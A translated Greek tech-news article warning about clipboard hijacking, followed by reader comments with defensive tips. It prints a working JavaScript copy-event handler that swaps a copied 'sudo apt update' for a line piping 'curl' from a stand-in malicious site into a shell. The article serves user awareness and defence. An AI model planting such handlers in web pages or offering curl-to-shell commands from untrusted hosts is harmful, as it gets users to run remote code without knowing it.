How they can violate you with a simple copy-paste

An unusual hacking demonstration will make you think twice before copying or pasting any text.

copaste

This is why you should NEVER copy pasting commands directly to your terminal. Ask any developer or administrator if they have ever copied a command line or code snippet from the web. The answer would probably be YES. You'll assume what you copied is what you paste, right? Well, no!

You think you are copying one thing, but it is being replaced by something else, such as malicious code. All you need is a single line of code inserted into the code you copied to create a backdoor in your application.

This attack is very simple but can cause great damage. Let's see how it works in practice:

Thanks to Harel Friedlander for recording this video.

Suppose you are looking for how to update your ubuntu and found the following command, Copy it. Try it - copy and paste the following command:

$ sudo apt update

 

Here is the JavaScript running exploit.

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
        'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
    );
    e.preventDefault();
});

How can I protect myself?

The safest way is to paste nothing from the web into your terminal. Another option is to add "#" before pasting, this will turn the command into a "comment" and will not execute it. This way you will see what you will paste before your terminal runs. You can of course paste the command into a txt file before putting it in your terminal.
Also many terminals can be configured not to run automatically when you paste a "\ n" (new line)

The above was just one example of why awareness raising is necessary to avoid any intrusion. There are many examples of really malicious scripts circulating on the internet.

iGuRu.gr The Best Technology Site in Greeceggns

Get the best viral stories straight into your inbox!















copy-paste, copy paste, hack, iguru

Written by giorgos

George still wonders what he's doing here ...

4 Comments

Leave a Reply
  1. The other alternative, of course, is to use an intermediate destination (eg text editor), where it will show what you really have in your clipboard.

  2. Good evening, Happy Birthday and Happy New Year !!

    I would like to thank you first for your informative articles.

    Another solution that solves the above problem works in firefox, about: config >> dom.event.clipboardevents.enabled >> false.

    A friend of the most customizable browser in the world.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).